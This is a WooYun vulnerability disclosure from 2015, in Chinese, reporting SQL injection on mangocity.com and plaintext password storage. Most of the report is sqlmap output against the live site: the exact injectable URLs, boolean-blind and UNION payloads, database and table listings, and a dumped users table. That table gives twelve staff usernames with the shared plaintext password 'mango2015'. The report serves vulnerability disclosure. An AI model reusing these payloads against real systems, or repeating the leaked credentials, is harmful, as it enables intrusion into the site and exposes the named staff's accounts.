当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123585

漏洞标题:芒果网两处SQL注入(密码明文存储)

相关厂商:芒果网

漏洞作者: 路人甲

提交时间:2015-06-30 09:42

修复时间:2015-07-05 09:44

公开时间:2015-07-05 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-07-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

主站SQL注入
密码明文存储
注入点1:

http://www.mangocity.com/product/10506752p2.html?
type=90&c=cholidayindexcontroller&m=comindex&d=grouptravel
type参数存在注入


注入点2:

http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?
thirdpartid=214412p2
thirdpartid参数存在注入

漏洞证明:

sqlmap identified the following injection points with a total of 183 HTTP(s) requests:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel
Type: UNION query
Title: MySQL UNION query (90) - 9 columns
Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
current user: 'vacation@10.10.4.55'
current database: 'vacation_init'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] test
[*] vacation_init
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel
Type: UNION query
Title: MySQL UNION query (90) - 9 columns
Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
Database: vacation_init
[37 tables]
+-----------------------------+
| album |
| album_relationships |
| business_module |
| business_module_bak20150419 |
| business_type |
| common_config |
| keyword |
| media |
| pm_params |
| pm_tui |
| pm_tui_bak20150618 |
| product |
| product_accommodation |
| product_additional |
| product_album |
| product_arrival |
| product_departure |
| product_departure_month |
| product_detail |
| product_detail_item |
| product_extra |
| product_itinerary |
| product_journey |
| product_journey_album |
| product_journey_event |
| product_journey_event_album |
| product_lineinfo |
| product_scenery |
| product_tag |
| product_theme |
| product_type |
| temp_update_product |
| term_relationships |
| term_taxonomy |
| terms |
| user_role |
| users |
+-----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel
Type: UNION query
Title: MySQL UNION query (90) - 9 columns
Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
back-end DBMS: MySQL 5
Database: vacation_init
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
| roleId | int(10) |
| username | varchar(20) |
+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel
Type: UNION query
Title: MySQL UNION query (90) - 9 columns
Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel
Type: UNION query
Title: MySQL UNION query (90) - 9 columns
Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
Database: vacation_init
Table: users
[12 entries]
+-------------+-----------+--------+
| username | password | roleId |
+-------------+-----------+--------+
| chenhuan | mango2015 | 0 |
| chenjie | mango2015 | 0 |
| cms | mango2015 | 0 |
| liuchunyan | mango2015 | 0 |
| panwei | mango2015 | 0 |
| pengwenhui | mango2015 | 0 |
| renxianglin | mango2015 | 0 |
| songwanbing | mango2015 | 0 |
| sunbaoyu | mango2015 | 0 |
| wuhongbo | mango2015 | 0 |
| xujia | mango2015 | 0 |
| zhanglan | mango2015 | 0 |
+-------------+-----------+--------+

修复方案:

参数过滤
密码储方式修改为加密存储

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-05 09:44

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-30 10:07 | 染血の雪 ( 普通白帽子 | Rank:117 漏洞数:16 | 击缻)

    看到历史记录一片忽略~